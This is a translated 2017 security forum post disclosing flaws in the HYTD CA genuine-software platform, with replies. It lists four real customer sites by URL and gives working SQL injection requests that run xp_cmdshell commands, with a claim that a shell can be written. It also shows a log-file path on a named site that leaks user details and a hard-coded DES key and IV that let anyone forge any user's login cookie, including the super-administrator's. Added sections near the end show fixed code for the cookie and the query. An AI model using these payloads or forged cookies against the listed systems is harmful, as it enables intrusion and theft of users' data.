[Approved] Finding vulnerabilities in the Beijing Huanyu Tongda CA genuine-software platform through penetration testing and reverse-engineering audit

s1m0n posted on 2017-2-19 18:39:40


This post was last edited by s1m0n on 2017-2-19 18:39.

The Beijing Huanyu Tongda (HYTD) CA genuine-software platform has vulnerabilities; its customers include the following:
(image 1.png)

A casual search turns up the following sites:
http://windows.ioa.ac.cn/
http://softms.sdu.edu.cn/
http://ca.issas.ac.cn/login.aspx
http://202.127.19.61/


The system has SQL injection: for an ordinary user, the keyword search at `Operation Log -> My Operation Log -> keyword search` is injectable, and stacked queries are supported.

Create a table in the database:
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bCREATE TABLE tmp(DATA VARCHAR(5000))%3b%20%2d%2d%20%44&mid=88 HTTP/1.1

Execute a command:
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bINSERT+tmp+EXEC+master.dbo.xp_cmdshell+'whoami'%3b%20%2d%2d%20%44&mid=88

A shell can be written directly.




After obtaining the DLL and reverse-engineering it, I recovered part of the source code.

Vulnerability 1: log file enumeration
Logs are stored under the web root as log/YYYYMM/YYYYMMDD.txt, for example view-source:http://windows.ioa.ac.cn/log/201702/20170209.txt

They leak usernames, user IDs and real names.


Vulnerability 2: arbitrary user cookie forgery
Because customers use different login methods (some SSO, some LDAP authentication), this may not be reproducible on all of them. The image below shows some of the login methods; as you can see, almost every customer has had its own developed.

(image t0150c9a2745c4c1357.png: login methods)
Let's look at how the user cookie is generated. SetSession simply encrypts the uid; the code is as follows:

```csharp
// SetSession: the cookie value is nothing more than the encrypted user ID
HttpCookie userCookie = new HttpCookie("HyUserInfo");
StringEncryption s = new StringEncryption();
userCookie.Value = s.Encrypt(ui.UserId.ToString());
HttpContext.Current.Response.Cookies.Add(userCookie);
```

The encryption function:
```csharp
// StringEncryption.Encrypt: DES-CBC with the instance's fixed key and iv
public string Encrypt(string sourceString)
{
    byte[] btKey = System.Text.Encoding.Default.GetBytes(this.key);
    byte[] btIV = System.Text.Encoding.Default.GetBytes(this.iv);
    System.Security.Cryptography.DESCryptoServiceProvider des = new System.Security.Cryptography.DESCryptoServiceProvider();
    string result;
    using (System.IO.MemoryStream ms = new System.IO.MemoryStream())
    {
        byte[] inData = System.Text.Encoding.Default.GetBytes(sourceString);
        try
        {
            using (System.Security.Cryptography.CryptoStream cs = new System.Security.Cryptography.CryptoStream(ms, des.CreateEncryptor(btKey, btIV), System.Security.Cryptography.CryptoStreamMode.Write))
            {
                cs.Write(inData, 0, inData.Length);
                cs.FlushFinalBlock();
            }
            // the ciphertext is base64-encoded and used as the cookie value
            result = System.Convert.ToBase64String(ms.ToArray());
        }
        catch
        {
            throw;
        }
    }
    return result;
}
```

Both the key and the IV are hard-coded:
```csharp
// string literals compiled into the assembly, so anyone with the DLL has them
private string iv = "HYTDCAPT";
private string key = "SHILPKEY";
```


The encrypted plaintext is, astonishingly, just the user ID, and user IDs increment from 1. So one can log in as every user, any user at all.
Moreover, the user with ID 1 is the super administrator, username hytdadmin, so this grants super-administrator privileges and access to the back end.

For example, logging in as the user with id 3:

(images t013f2ab583657eabd5.png, t01de6851a25d888185.png)

Vulnerability 3: multiple SQL injections
The getshell above used the SQL injection in an ordinary user's My Logs -> Search Logs. Let's look at the code:

```csharp
// MylogList.aspx (ordinary user's "My Operation Log"): the WHERE clause is
// assembled from raw query-string values
System.Text.StringBuilder strWhere = new System.Text.StringBuilder();
System.Text.StringBuilder urlStr = new System.Text.StringBuilder();
this.ui = BaseUser.GetUserInfo();
this.mid = System.Convert.ToInt32(base.Request.QueryString["mid"]);
this.PageSize = BaseModule.GetDisplayLine(this.mid);
if (!base.IsPostBack)
{
    this.PageIndex = 1;
    strWhere.Append(" UserID=" + this.ui.UserId);
    this.PageIndex = System.Convert.ToInt32(base.Request.QueryString["page"]);
    if (this.PageIndex == 0)
    {
        this.PageIndex = 1;
    }
    string typename = base.Request.QueryString["ltsName"];
    if (!string.IsNullOrEmpty(typename))
    {
        this.ltsName = typename;
    }
    // key, lts, begt and endt come straight from the request
    this.key = base.Request.QueryString["key"];
    this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
    this.begt = base.Request.QueryString["begt"];
    this.endt = base.Request.QueryString["endt"];
    if (this.key != null && this.key != "")
    {
        urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
        // the unescaped key is spliced into three LIKE predicates
        strWhere.Append(string.Concat(new string[]
        {
            " and (LogTitle like '%",
            this.key,
            "%' or RealName like '%",
            this.key,
            "%' or LogRecord like '%",
            this.key,
            "%')"
        }));
    }
    if (this.lts > 0)
    {
        urlStr.Append("&lts=" + this.lts);
        strWhere.Append(" and LogType=" + this.lts);
    }
    if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
    {
        urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
        // the date strings are concatenated, not parsed
        strWhere.Append(string.Concat(new string[]
        {
            " and DateTime>='",
            this.begt,
            " 00:00:00' and DateTime<='",
            this.endt,
            " 23:59:59'"
        }));
    }
    else
    {
        if (this.begt != null && this.begt != "")
        {
            urlStr.Append("&begt=" + this.begt);
            strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
        }
        if (this.endt != null && this.endt != "")
        {
            urlStr.Append("&endt=" + this.endt);
            strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
        }
    }
    string strOrder = " LID desc";
    HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
    this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
    this.Repeater1.DataBind();
    HYTD.CAPlatform.BLL.TB_Module mTitle = new HYTD.CAPlatform.BLL.TB_Module();
    object Totle = Bll_Log.GetRecordCount(strWhere.ToString());
    string FileUrl = string.Concat(new object[]
    {
        "MylogList.aspx?1",
        urlStr,
        "&mid=",
        this.mid
    });
    string url = "";
    string ShowJump = "true";
    int pagestyle = 2;
    this.cutepage.Text = GetPage.PageStr(FileUrl, url, System.Convert.ToInt32(Totle), this.PageSize, this.PageIndex, ShowJump, pagestyle);
    this.Repeater1.Dispose();
    if (System.Convert.ToInt32(Totle) < 1)
    {
        this.noinfo.Visible = true;
        this.noinfo.Text = "<tr><td colspan=\"8\">没有数据....</td></tr>";
    }
}
```

The user-supplied keyword, dates and so on are taken directly, concatenated into strWhere, and then Bll_Log.GetList is called; Bll_Log.GetList calls dal.GetList, and dal.GetList calls DbHelperSQL.GetRecordByPage. Let's look at the code:

It concatenates directly and then calls the Query function:

```csharp
// HYTD.CAPlatform.DBUtility.DbHelperSQL
// strWhere and strOrder are spliced into the paging query verbatim (twice on pages > 1)
public static DataSet GetRecordByPage(string TableName, string mainfldName, string fldName, int pageSize, int currentPage, string strOrder, string strWhere)
{
    if (strOrder != "")
    {
        strOrder = " order by " + strOrder;
    }
    string strSQL;
    if (currentPage > 1)
    {
        int subpage = (currentPage - 1) * pageSize;
        if (strWhere != "")
        {
            strSQL = string.Concat(new object[]
            {
                "select top ",
                pageSize,
                "  ",
                fldName,
                " from ",
                TableName,
                "  where ",
                mainfldName,
                " not in (select top ",
                subpage.ToString(),
                " ",
                mainfldName,
                " from ",
                TableName,
                "  where ",
                strWhere,
                " ",
                strOrder,
                " )  and ",
                strWhere,
                " ",
                strOrder
            });
        }
        else
        {
            strSQL = string.Concat(new object[]
            {
                "select top ",
                pageSize,
                "  ",
                fldName,
                " from ",
                TableName,
                "  where  ",
                mainfldName,
                " not in (select top ",
                subpage.ToString(),
                " ",
                mainfldName,
                " from ",
                TableName,
                "  ",
                strOrder,
                " )  ",
                strOrder
            });
        }
    }
    else if (strWhere != "")
    {
        strSQL = string.Concat(new object[]
        {
            "select top ",
            pageSize,
            "  ",
            fldName,
            " from ",
            TableName,
            "  where ",
            strWhere,
            " ",
            strOrder
        });
    }
    else
    {
        strSQL = string.Concat(new object[]
        {
            "select top ",
            pageSize,
            "  ",
            fldName,
            " from ",
            TableName,
            "  ",
            strOrder
        });
    }
    // the assembled text is executed as-is, which is why stacked queries work
    return DbHelperSQL.Query(strSQL);
}
```


SQL injection 2

For an administrator there are many places to get a shell; for example, the search in System Settings -> Installed Software Management is injectable. It lives in HYTD.CAPlatform.Web.ashx.DownloadSoft. Looking at the code:

```csharp
string strName = WebUtil.GetQueryValue<string>("name", "");
```

strName is read here,
```csharp
if (strName != null)
{
    search = strName.Trim();
}
```


assigned to search,
```csharp
if (search != "")
{
    // only Trim() was applied; the value goes into the LIKE clause unescaped
    search = " name like '%" + search + "%'";
    where = where + " and " + search;
}
```

concatenated straight into the SQL statement,
```csharp
// (the condition preceding this block was not included in the post)
{
    dt = this.bll.GetSoftInfoForSortDownCount(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
}
else
{
    dt = this.bll.GetSoftInfo(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
}
```

and the function is called to execute it:
```csharp
// HYTD.CAPlatform.DAL.TB_SoftDownList
public DataTable GetSoftInfoForSortDownCount(TB_SoftDownList model, string where, int pagesize, int pageindex, string strOrder)
{
    StringBuilder strsql = new StringBuilder();
    string Where = string.Empty;
    if (where != "")
    {
        Where = where;
    }
    else
    {
        Where = "status=1";
    }
    strsql.Append("select top " + pagesize + "  *,(mark/(case man when 0 then 1 else man end))as softcomm from tb_softdownlist \r\n            left join (select OS_SoftID,count(OS_SoftID) sort from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID\r\n            where id not in ");
    // the caller's where clause is appended twice, once in the subquery and once outside it
    strsql.Append(string.Concat(new object[]
    {
        "(select top ",
        pagesize * (pageindex - 1),
        " id from tb_softdownlist left join (select OS_SoftID,count(OS_SoftID) sort \r\n            from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID where ",
        Where,
        strOrder,
        ") "
    }));
    strsql.Append(" and " + Where + " " + strOrder);
    return DbHelperSQL.Query(strsql.ToString()).Tables[0];
}
```

Direct concatenation, resulting in SQL injection.


SQL injection 3

Administrator viewing user logs:

```csharp
// admin log view: same pattern as MylogList.aspx
this.key = base.Request.QueryString["key"];
this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
this.begt = base.Request.QueryString["begt"];
this.endt = base.Request.QueryString["endt"];
string typename = base.Request.QueryString["ltsName"];
if (!string.IsNullOrEmpty(typename))
{
    this.ltsName = typename;
}
if (this.PageIndex == 0)
{
    this.PageIndex = 1;
}
if (this.key != null && this.key != "")
{
    urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
    // raw key concatenated into the LIKE predicates
    strWhere.Append(string.Concat(new string[]
    {
        " and (LogTitle like '%",
        this.key,
        "%' or RealName like '%",
        this.key,
        "%' or LogRecord like '%",
        this.key,
        "%')"
    }));
}
if (this.lts > 0)
{
    urlStr.Append("&lts=" + this.lts);
    strWhere.Append(" and LogType=" + this.lts);
}
if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
{
    urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
    strWhere.Append(string.Concat(new string[]
    {
        " and DateTime>='",
        this.begt,
        " 00:00:00' and DateTime<='",
        this.endt,
        " 23:59:59'"
    }));
}
else
{
    if (this.begt != null && this.begt != "")
    {
        urlStr.Append("&begt=" + this.begt);
        strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
    }
    if (this.endt != null && this.endt != "")
    {
        urlStr.Append("&endt=" + this.endt);
        strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
    }
}
```
key, begt and endt are read directly and concatenated into strWhere, and then Bll_Log.GetList is called:

```csharp
string strOrder = " LID desc";
HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
```

The rest of the flow is the same as the first one, so I won't repeat it.




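How the HyUserInfo cookie could be issued and checked without the hard-coded DES key, as an added example that is not code from the post or from the HYTD product: the ticket carries an expiry and an HMAC under a server-side secret, so a client who knows a uid still cannot produce a valid cookie. The class name HyUserTicket, the HyUserTicketKey setting and the 8-hour lifetime are assumptions; it targets ASP.NET on .NET Framework and assumes the site is served over HTTPS.

```csharp
using System;
using System.Configuration;
using System.Security.Cryptography;
using System.Text;
using System.Web;

// Hypothetical replacement for the HyUserInfo cookie: an expiring ticket whose
// integrity depends on a server-side secret, so knowing a uid is not enough.
public static class HyUserTicket
{
    // Assumption: the secret is read from protected configuration (placeholder
    // setting name), not from a string literal in the assembly like the original key/iv.
    private static readonly byte[] Secret =
        Convert.FromBase64String(ConfigurationManager.AppSettings["HyUserTicketKey"]);

    // Ticket format: "<uid>|<expiryUtcTicks>|<base64 HMAC-SHA256 over 'uid|expiry'>"
    public static string Issue(int userId, TimeSpan lifetime)
    {
        string payload = userId + "|" + DateTime.UtcNow.Add(lifetime).Ticks;
        return payload + "|" + Convert.ToBase64String(Mac(payload));
    }

    // Yields the uid only when the MAC verifies and the ticket has not expired.
    public static bool TryVerify(string ticket, out int userId)
    {
        userId = 0;
        string[] parts = (ticket ?? "").Split('|');
        if (parts.Length != 3) return false;
        byte[] given;
        try { given = Convert.FromBase64String(parts[2]); } catch (FormatException) { return false; }
        if (!FixedTimeEquals(Mac(parts[0] + "|" + parts[1]), given)) return false;
        long expiry;
        return long.TryParse(parts[1], out expiry) && expiry >= DateTime.UtcNow.Ticks
            && int.TryParse(parts[0], out userId);
    }

    // Sets the cookie with the flags the original SetSession did not set.
    public static void SetCookie(HttpResponse response, int userId)
    {
        var cookie = new HttpCookie("HyUserInfo", Issue(userId, TimeSpan.FromHours(8)));
        cookie.HttpOnly = true; // not readable from script
        cookie.Secure = true;   // only sent over HTTPS (assumes an HTTPS-only site)
        response.Cookies.Add(cookie);
    }

    private static byte[] Mac(string payload)
    {
        using (var h = new HMACSHA256(Secret))
            return h.ComputeHash(Encoding.UTF8.GetBytes(payload));
    }

    // Constant-time comparison; CryptographicOperations.FixedTimeEquals is not in .NET Framework.
    private static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        if (a.Length != b.Length) return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }
}
```

On each request the application calls TryVerify on the incoming cookie and treats a false result as not logged in; the uid is trusted only after the MAC check, never read out of the cookie directly.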
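The MylogList search from the post rebuilt with parameters, as an added example (not the product's code): key, dates and paging values are bound as SqlParameters instead of being concatenated into strWhere and handed down to DbHelperSQL.Query, which also removes the stacked-query path used above. Assumed: a table named TB_Log (after the DAL class in the post) with the columns the post's WHERE clause references, a connection string supplied by the caller, and SQL Server 2012+ for OFFSET/FETCH.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical rewrite of the MylogList search: every user-controlled value
// (key, begt, endt, paging) travels as a SqlParameter, never as SQL text.
public static class MyLogSearch
{
    // Escape LIKE metacharacters so a user-typed "%", "_" or "[" matches literally.
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Assumptions: the log table is TB_Log with the columns named in the post's
    // WHERE clause; OFFSET/FETCH needs SQL Server 2012 or later.
    public static DataTable Search(string connStr, int userId, string key,
                                   DateTime? begt, DateTime? endt,
                                   int pageSize, int pageIndex)
    {
        const string sql =
            "SELECT LID, LogTitle, RealName, LogRecord, LogType, [DateTime] " +
            "FROM TB_Log " +
            "WHERE UserID = @uid " +
            "  AND (@key IS NULL OR LogTitle LIKE @key OR RealName LIKE @key OR LogRecord LIKE @key) " +
            "  AND (@begt IS NULL OR [DateTime] >= @begt) " +
            "  AND (@endt IS NULL OR [DateTime] <= @endt) " +
            "ORDER BY LID DESC " +
            "OFFSET @skip ROWS FETCH NEXT @take ROWS ONLY;";

        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@uid", SqlDbType.Int).Value = userId;
            // Wildcards wrap the escaped text here, so the parameter is still plain data.
            cmd.Parameters.Add("@key", SqlDbType.NVarChar, 200).Value =
                string.IsNullOrEmpty(key) ? (object)DBNull.Value : "%" + EscapeLike(key) + "%";
            // Real DateTime values replace the original's " 00:00:00" / " 23:59:59" string suffixes.
            cmd.Parameters.Add("@begt", SqlDbType.DateTime).Value =
                begt.HasValue ? (object)begt.Value.Date : DBNull.Value;
            cmd.Parameters.Add("@endt", SqlDbType.DateTime).Value =
                endt.HasValue ? (object)endt.Value.Date.AddDays(1).AddSeconds(-1) : DBNull.Value;
            cmd.Parameters.Add("@skip", SqlDbType.Int).Value = Math.Max(pageIndex - 1, 0) * pageSize;
            cmd.Parameters.Add("@take", SqlDbType.Int).Value = pageSize;

            var dt = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader()) dt.Load(reader);
            return dt;
        }
    }
}
```

The page code parses begt/endt with DateTime.TryParseExact before calling Search and passes null on failure, so malformed dates are rejected rather than forwarded.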

any3ite posted on 2017-2-20 10:12:55


Great article, thanks for sharing.
一人一刀下北凉 posted on 2017-2-22 14:00:21


thx for sharing
这只猪 posted on 2017-3-21 12:57:28


Impressive, impressive. Respect to the expert who can audit .NET.
vercher posted on 2017-3-22 15:05:36


That weblog is awesome.....